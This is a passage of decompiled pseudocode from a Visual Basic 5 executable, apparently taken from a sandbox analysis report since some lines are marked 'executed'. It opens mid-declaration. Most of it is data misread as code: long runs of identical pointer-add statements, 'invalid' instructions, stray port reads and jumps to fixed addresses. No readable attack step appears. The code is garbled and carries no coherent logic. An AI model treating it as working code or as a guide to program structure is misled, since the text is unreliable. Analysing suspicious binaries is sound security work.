				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				intOrPtr _v1056948190;
				signed int _t741;
				signed int _t743;
				signed int _t744;
				signed char _t747;
				signed char _t748;
				signed char _t749;
				signed char* _t755;
				signed char _t756;
				intOrPtr* _t757;
				signed char _t758;
				intOrPtr* _t759;
				signed int _t761;
				intOrPtr* _t762;
				intOrPtr* _t763;
				signed char _t764;
				intOrPtr* _t765;
				intOrPtr* _t766;
				intOrPtr* _t767;
				intOrPtr* _t768;
				signed int _t770;
				intOrPtr* _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				void* _t777;
				intOrPtr* _t779;
				void* _t780;
				intOrPtr* _t782;
				void* _t783;
				intOrPtr* _t785;
				intOrPtr* _t786;
				signed int _t787;
				signed int _t790;
				intOrPtr* _t791;
				intOrPtr* _t792;
				intOrPtr* _t793;
				intOrPtr* _t794;
				intOrPtr* _t795;
				signed char _t796;
				signed char _t797;
				signed char _t798;
				signed char _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed char _t803;
				intOrPtr* _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed char _t808;
				signed char _t809;
				signed int _t820;
				void* _t822;
				signed char _t825;
				intOrPtr* _t827;
				signed int _t828;
				signed int _t829;
				signed int* _t830;
				signed int _t845;
				signed int _t850;
				signed int _t863;
				signed int _t882;
				signed int _t890;
				signed int _t910;
				signed int _t927;
				signed int _t936;
				signed int _t947;
				signed int _t984;
				signed int _t1001;
				signed int _t1009;
				signed int _t1014;
				signed int _t1032;
				signed int _t1036;
				signed int _t1060;
				signed int _t1067;
				signed int _t1075;
				signed int _t1080;
				signed int _t1090;
				signed int _t1097;
				signed int _t1100;
				void* _t1104;
				intOrPtr* _t1119;
				signed char _t1121;
				signed char _t1122;
				signed char _t1123;
				signed char _t1124;
				intOrPtr _t1127;
				void* _t1130;
				void* _t1131;
				void* _t1132;
				intOrPtr* _t1133;
				signed int* _t1137;
				signed int* _t1138;
				void* _t1139;
				void* _t1140;
				intOrPtr* _t1143;
				signed char _t1144;
				signed int _t1147;
				void* _t1148;
				char* _t1160;
				char* _t1162;
				char* _t1163;
				char* _t1165;
				char* _t1166;
				char* _t1169;
				signed char _t1174;
				intOrPtr* _t1175;
				void* _t1177;
				void* _t1178;
				signed char* _t1180;
				intOrPtr* _t1202;
				intOrPtr* _t1204;
				void* _t1205;
				signed int _t1209;
				signed int _t1225;
				void* _t1226;
				signed int _t1228;
				signed int _t1230;
				void* _t1235;
				signed int _t1238;
				void* _t1239;
				void* _t1241;
				signed int _t1244;
				intOrPtr* _t1245;
				void* _t1246;
				void* _t1247;
				long long* _t1248;
				long long* _t1249;
				long long* _t1250;
				signed int _t1254;
				void* _t1257;

				_t1257 = __fp0;
				_t1199 = __edi;
				_t1142 = __ecx;
				_t1129 = __ebx;
				_push("VB5!6&*"); // executed
				L004016D0(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t741 = __eax + 1;
				 *_t741 =  *_t741 + _t741;
				 *_t741 =  *_t741 + _t741;
				 *_t741 =  *_t741 + _t741;
				 *((intOrPtr*)(_t1235 + 0x7d + _t741 * 2)) =  *((intOrPtr*)(_t1235 + 0x7d + _t741 * 2)) + _t741;
				asm("invalid");
				asm("cmpsb");
				asm("cmpsd");
				_t1174 = 0x000000d8 ^ __ecx;
				_t743 =  *_t1174 * 0x10000;
				 *_t743 =  *_t743 + _t743;
				if( *_t743 == 0) {
					L8:
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					asm("popad");
					 *_t743 =  *_t743 + _t743;
					_t10 = _t743 + _t743;
					 *_t10 =  *(_t743 + _t743) + _t1129;
					__eflags =  *_t10;
					L9:
					 *_t743 =  *_t743 + _t743;
					__eflags =  *_t743;
					L10:
					 *_t743 =  *_t743 + _t743;
					__eflags = _t743;
					L11:
					asm("outsb");
					asm("o16 jb 0x6c");
					_t1238 =  *(_t1205 + 0x6e) * 0x737365;
					_t744 = _t743 | 0x44001101;
					_push(_t1174);
					_t1130 = _t1129 - 1;
					_push(_t1238);
					_t1202 = _t1199 - 0xffffffffffffffff;
					_push(_t1174);
					_push(_t1174);
					_push(_t1130);
					 *_t1142 =  *_t1142 + _t1130;
					 *_t744 =  *_t744 + _t744;
					_t1175 = _t1174 + 1;
					 *_t1175 =  *_t1175 + _t744;
					_t1239 = _t1238 +  *((intOrPtr*)(_t1142 + _t1175));
					 *((intOrPtr*)(_t1202 + 0x4d + _t1142 * 2)) =  *((intOrPtr*)(_t1202 + 0x4d + _t1142 * 2)) + _t744;
					_push(_t1175);
					_t1131 = _t1130 - 1;
					_push(_t1239);
					_t1204 = _t1202;
					_push(_t1175);
					_push(_t1175);
					_t1209 = _t1205 - 0xfffffffffffffffe;
					_push(_t1131);
					 *0x135c =  *0x135c + _t1175;
					_push(_t1131);
					asm("sbb eax, [eax]");
					 *_t1142 =  *_t1142 + _t1131;
					asm("sbb al, [eax]");
					 *((intOrPtr*)(_t1175 + 0x44000013)) =  *((intOrPtr*)(_t1175 + 0x44000013)) + _t1131;
					 *((intOrPtr*)(_t1209 + 2)) =  *((intOrPtr*)(_t1209 + 2)) + _t744;
					 *((intOrPtr*)(_t744 + _t744)) =  *((intOrPtr*)(_t744 + _t744)) + 1;
					 *_t1209 =  *_t1209 + _t744;
					 *_t744 =  *_t744 + _t744;
					 *((intOrPtr*)(_t1209 + 0x42)) =  *((intOrPtr*)(_t1209 + 0x42)) + _t1175;
					_t747 = _t744 + _t744 + 0x00000001 ^ 0x2a263621;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t1209 =  *_t1209 + _t1131;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					_t748 = _t747 |  *_t747;
					asm("adc [eax+eax], al");
					 *_t748 =  *_t748 + _t748;
					 *_t748 =  *_t748 + _t748;
					 *_t748 =  *_t748 + _t748;
					 *_t748 =  *_t748 + _t748;
					 *_t748 =  *_t748 + _t1142;
					asm("sbb [eax], eax");
					_t749 = _t748 + _t1175;
					 *_t1142 =  *_t1142 ^ _t749;
					_t1132 = _t1131 + _t1131;
					asm("invalid");
					 *_t749 =  *_t749 | _t749;
					 *_t749 =  *_t749 + _t749;
					 *_t749 =  *_t749 + _t749;
					 *_t749 =  *_t749 + _t749;
					__eflags =  *_t749;
					 *((intOrPtr*)(_t749 +  *_t749)) =  *((intOrPtr*)(_t749 +  *_t749)) + _t749 +  *_t749;
					goto 0x88401839;
					asm("sbb [eax], al");
					_push(ss);
					 *((intOrPtr*)(0x3d)) =  *((intOrPtr*)(0x3d)) + _t1132;
					 *((intOrPtr*)(0x3d)) =  *((intOrPtr*)(0x3d)) + 0x1d;
					_t755 =  *((intOrPtr*)(0x3d));
					 *_t755 = 0x3d;
					 *_t755 =  &(_t755[ *_t755]);
					_t756 =  *_t755;
					 *_t756 =  *_t756 + _t756;
					 *_t756 = es;
					 *_t756 =  *_t756 + _t756;
					 *_t756 =  *_t756 + _t756;
					 *_t756 =  *_t756 + _t756;
					 *_t756 =  *_t756 + _t756;
					 *_t756 =  *_t756 + _t756;
					 *_t756 =  *_t756 + _t756;
					 *_t756 =  *_t756 + _t756;
					 *_t756 =  *_t756 + _t756;
					 *_t756 =  *_t756 + _t756;
					_t1225 =  &_v1;
					__eflags = _t1225;
					asm("outsd");
					if(_t1225 < 0) {
						L20:
						 *_t756 =  *_t756 + _t1142;
						_pop(ss);
						_t756 = _t756 + 1;
						_t35 = _t756 + _t756;
						 *_t35 =  *(_t756 + _t756) + _t1142;
						__eflags =  *_t35;
						goto L21;
					} else {
						asm("gs outsb");
						_t1209 =  *(_t1209 + 0x69) * 0x73;
						__eflags = _t1209;
						if(_t1209 == 0) {
							L21:
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t1175;
							 *_t756 =  *_t756 + _t756;
							__eflags =  *_t756;
							if(__eflags < 0) {
								L19:
								 *_t1175 =  *_t1175 + _t1132;
								 *_t756 =  *_t756 + _t756;
								__eflags =  *_t756;
								goto L20;
							}
							if(__eflags > 0) {
								L25:
								 *_t756 =  *_t756 + _t756;
								asm("in al, 0x23");
								_t757 = _t756 + 1;
								 *_t757 =  *_t757 + _t757;
								 *_t757 =  *_t757 + _t757;
								_t758 = _t757 + _t757;
								goto 0x41;
								asm("lock adc [eax], eax");
								 *_t758 =  *_t758 + _t1142;
								 *_t1142 =  *_t1142 ^ _t758;
								 *(_t758 + _t758 * 2) =  !( *(_t758 + _t758 * 2));
								 *_t758 =  *_t758 + _t758;
								 *_t1142 =  *_t1142 ^ _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								 *_t758 =  *_t758 + _t758;
								asm("in al, 0x17");
								_t759 = _t758 + 1;
								 *_t1142 =  *_t1142 + _t759;
								 *_t759 =  *_t759 + _t759;
								 *_t1142 =  *_t1142 + _t759;
								 *_t1142 =  *_t1142 + _t759;
								_t761 = _t759 + _t759 &  *(_t759 + _t759);
								 *_t761 =  *_t761 + _t761;
								 *_t761 =  *_t761 + _t761;
								_push(_t761);
								asm("in al, 0x40");
								_t1133 = _t1132 + _t1132;
								asm("invalid");
								 *_t761 =  *_t761 + 1;
								 *_t761 =  *_t761 + _t761;
								 *((intOrPtr*)(_t761 + 0x24)) =  *((intOrPtr*)(_t761 + 0x24)) + _t1142;
								_t762 = _t761 + 1;
								 *((intOrPtr*)(_t762 + _t1209)) =  *((intOrPtr*)(_t762 + _t1209)) + _t1133;
								_t1143 = _t1142 + 1;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *((intOrPtr*)(_t762 + 0x4f)) =  *((intOrPtr*)(_t762 + 0x4f)) + _t1133;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								asm("fcomp qword [ebx]");
								_t763 = _t762 + 1;
								 *_t1143 =  *_t1143 + _t763;
								 *_t763 =  *_t763 + _t763;
								_t764 = _t763 + _t1133;
								 *_t764 =  *_t764 ^ _t764;
								 *_t764 =  *_t764 + _t764;
								 *_t764 =  *_t764 + _t764;
								asm("fcomp qword [ebx]");
								_t765 = _t764 + 1;
								 *_t1143 =  *_t1143 + _t765;
								 *_t765 =  *_t765 + _t765;
								_t766 = _t765 + _t765;
								asm("sbb eax, [eax]");
								 *_t766 =  *_t766 + _t766;
								 *_t766 =  *_t766 + _t766;
								asm("loopne 0x1d");
								_t767 = _t766 + 1;
								 *_t1133 =  *_t1133 + _t767;
								 *_t767 =  *_t767 + _t767;
								_t768 = _t767 + _t767;
								asm("sbb eax, [eax]");
								 *_t768 =  *_t768 + _t768;
								asm("sbb al, 0x40");
								 *((intOrPtr*)(_t768 + 0x33)) =  *((intOrPtr*)(_t768 + 0x33)) + _t1175;
								_t1144 = _t1143 + 1;
								 *_t768 =  *_t768 + _t768;
								 *_t768 =  *_t768 + _t768;
								 *_t1204 =  *_t1204 + _t768;
								asm("outsb");
								 *((intOrPtr*)(_t1144 + _t1209)) =  *((intOrPtr*)(_t1144 + _t1209)) + _t1144;
								 *((intOrPtr*)(_t1144 + _t1209)) =  *((intOrPtr*)(_t1144 + _t1209)) + 1;
								_t770 = _t768 + 2;
								 *_t770 =  *_t770 + _t770;
								 *((intOrPtr*)(_t1144 + _t1209)) =  *((intOrPtr*)(_t1144 + _t1209)) + _t1144;
								_t772 = (_t770 | 0x00003400) + 1;
								 *_t1144 =  *_t1144 + _t772;
								 *1 =  *1 + _t772;
								 *_t772 =  *_t772 + _t772;
								 *_t772 =  *_t772 + _t772;
								 *_t772 =  *_t772 + _t772;
								 *_t772 =  *_t772 + _t772;
								 *((intOrPtr*)(_t1239 + 0x41)) =  *((intOrPtr*)(_t1239 + 0x41)) + 1;
								 *_t772 =  *_t772 + 1;
								asm("in al, dx");
								asm("insd");
								 *((intOrPtr*)(_t1144 + _t1209)) =  *((intOrPtr*)(_t1144 + _t1209)) + 1;
								_t773 = _t772 + 1;
								 *_t1144 =  *_t1144 + _t773;
								 *1 =  *1 + _t773;
								 *_t773 =  *_t773 + _t773;
								ss = 0x5c006c00;
								 *_t773 =  *_t773 + 1;
								 *_t773 =  *_t773 + _t773;
								 *((intOrPtr*)(_t1144 + _t1209 + 0x40)) =  *((intOrPtr*)(_t1144 + _t1209 + 0x40)) + _t1144;
								 *_t1175 =  *_t1175 + _t773;
								 *1 =  *1 + _t773;
								 *_t773 =  *_t773 + _t773;
								 *_t773 =  *_t773 + _t773;
								 *_t773 =  *_t773 + _t773;
								 *_t773 =  *_t773 + _t773;
								 *((intOrPtr*)(_t773 + 0x2800401c)) =  *((intOrPtr*)(_t773 + 0x2800401c)) + _t1144;
								asm("in al, dx");
								asm("insd");
								 *((intOrPtr*)(_t1144 + _t1209 + 0x40)) =  *((intOrPtr*)(_t1144 + _t1209 + 0x40)) + 1;
								 *_t1175 =  *_t1175 + _t773;
								 *1 =  *1 + _t773;
								 *_t773 =  *_t773 + _t773;
								ds = 0;
								 *((intOrPtr*)(_t773 + _t773)) =  *((intOrPtr*)(_t773 + _t773)) + 1;
								 *_t773 =  *_t773 + _t773;
								asm("lodsb");
								_t774 = _t773 & 0xffff0040;
								asm("invalid");
								 *_t774 =  *_t774 + _t774;
								 *_t774 =  *_t774 + _t774;
								 *_t774 =  *_t774 + _t774;
								 *_t774 =  *_t774 + _t774;
								asm("sbb al, 0x1d");
								_t775 = _t774 + 1;
								 *((intOrPtr*)(_t775 - 0x43ff94f5)) =  *((intOrPtr*)(_t775 - 0x43ff94f5)) + _t1175;
								_t776 = _t775 & 0xffff0040;
								asm("invalid");
								 *_t776 =  *_t776 + _t776;
								 *_t776 =  *_t776 + _t776;
								asm("in al, 0x1b");
								_t777 = _t776 + 1;
								 *0x00000042 =  *((intOrPtr*)(0x42)) + _t777;
								 *((intOrPtr*)(_t1209 - 0x3bffbfea)) =  *((intOrPtr*)(_t1209 - 0x3bffbfea)) + 1;
								_push(ss);
								_push(ss);
								_t779 = _t777 + 2;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *_t779 =  *_t779 + _t779;
								 *((intOrPtr*)(_t1239 + 1)) =  *((intOrPtr*)(_t1239 + 1)) + _t1144;
								_t780 = _t779 + 1;
								 *((intOrPtr*)(0x42)) =  *((intOrPtr*)(0x42)) + _t780;
								 *((intOrPtr*)(_t1209 - 0x3bffbfea)) =  *((intOrPtr*)(_t1209 - 0x3bffbfea)) + 1;
								_push(ss);
								_t1177 = _t1175 + _t1144 + _t1144;
								_push(ss);
								_t782 = _t780 + 2;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *_t782 =  *_t782 + _t782;
								 *((intOrPtr*)(_t1239 + 1)) =  *((intOrPtr*)(_t1239 + 1)) + _t1177;
								_t783 = _t782 + 1;
								 *((intOrPtr*)(0x42)) =  *((intOrPtr*)(0x42)) + _t783;
								 *((intOrPtr*)(_t1209 - 0x3bffbfea)) =  *((intOrPtr*)(_t1209 - 0x3bffbfea)) + 1;
								_push(ss);
								_t1178 = _t1177 + _t1144;
								_push(ss);
								_t785 = _t783 + 2;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
